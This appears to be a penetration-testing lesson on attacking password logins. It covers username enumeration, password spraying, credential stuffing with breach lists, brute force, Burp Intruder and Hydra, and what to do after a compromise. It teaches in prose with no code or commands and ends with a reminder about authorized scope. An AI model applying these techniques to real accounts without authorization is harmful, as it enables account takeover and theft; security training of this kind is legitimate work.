Attacking Password-Based Authentication

Despite the prevalence of sophisticated attacks, gaining unauthorized access often comes down to compromising passwords. This lesson covers practical techniques for attacking password-based authentication systems, from identifying vulnerabilities to successfully gaining access.

Account Enumeration

Before attacking an account, you need to confirm it exists. Many applications inadvertently reveal valid usernames through different error messages. An error like "Invalid password" for valid usernames versus "Account does not exist" for invalid ones allows attackers to compile lists of valid accounts.

Test the login form with both valid and invalid usernames, carefully comparing responses. Look beyond the displayed message—examine response timing, status codes, and response size. Subtle differences often reveal the distinction even when error messages are the same.

Registration and password reset flows provide additional enumeration vectors. "This email is already registered" during signup confirms an account exists. Password reset might respond differently for valid versus invalid addresses. Each endpoint needs examination for information disclosure.

Credential Attacks

With valid usernames identified, the actual password attack begins. Password spraying tests one or a few common passwords against many accounts. This approach avoids triggering lockouts that activate after consecutive failed attempts on a single account. Testing "Password123" or "Summer2024" across a thousand accounts often yields results.

Credential stuffing uses previously breached username/password combinations. Data breaches regularly expose millions of credentials, and users frequently reuse passwords across sites. Obtain credential lists from breach databases and systematically test them against your target.

Brute-force attacks try many passwords against single accounts. This traditional approach works when no account lockout exists or when you can discover a reset mechanism. Attack speed depends on rate limiting—some applications permit unlimited attempts while others implement delays or lockouts.

Using Attack Tools

Burp Suite's Intruder tool provides an excellent platform for credential attacks. Configure the login request as a template, mark the username and password fields as injection points, and load your wordlists. Different attack types support various strategies—sniper for single-field attacks, pitchfork for synchronized lists, and cluster bomb for all combinations.

Hydra and similar command-line tools offer high-speed attacks when Burp's speed is insufficient. These tools support numerous protocols beyond HTTP, making them versatile for attacking authentication across services.

Wordlist quality significantly impacts success rates. Generic lists like rockyou contain common passwords but miss organization-specific patterns. Consider what passwords users might choose—company names, location names, current year, and common patterns all deserve inclusion in your customized wordlists.

Post-Exploitation of Credentials

Successfully compromising a password is only the beginning. Document the credential immediately and verify its validity through legitimate login. Check the account's privilege level—you might have compromised an administrator rather than a regular user.

Explore what the compromised account can access. Look for credential reuse opportunities where the same password might work on other systems. Search for additional credentials stored in the account—password managers, configuration files, or email containing password reset links.

Remember ethical boundaries. During authorized testing, access only what your scope permits. Document findings for your client rather than pursuing access beyond what's agreed.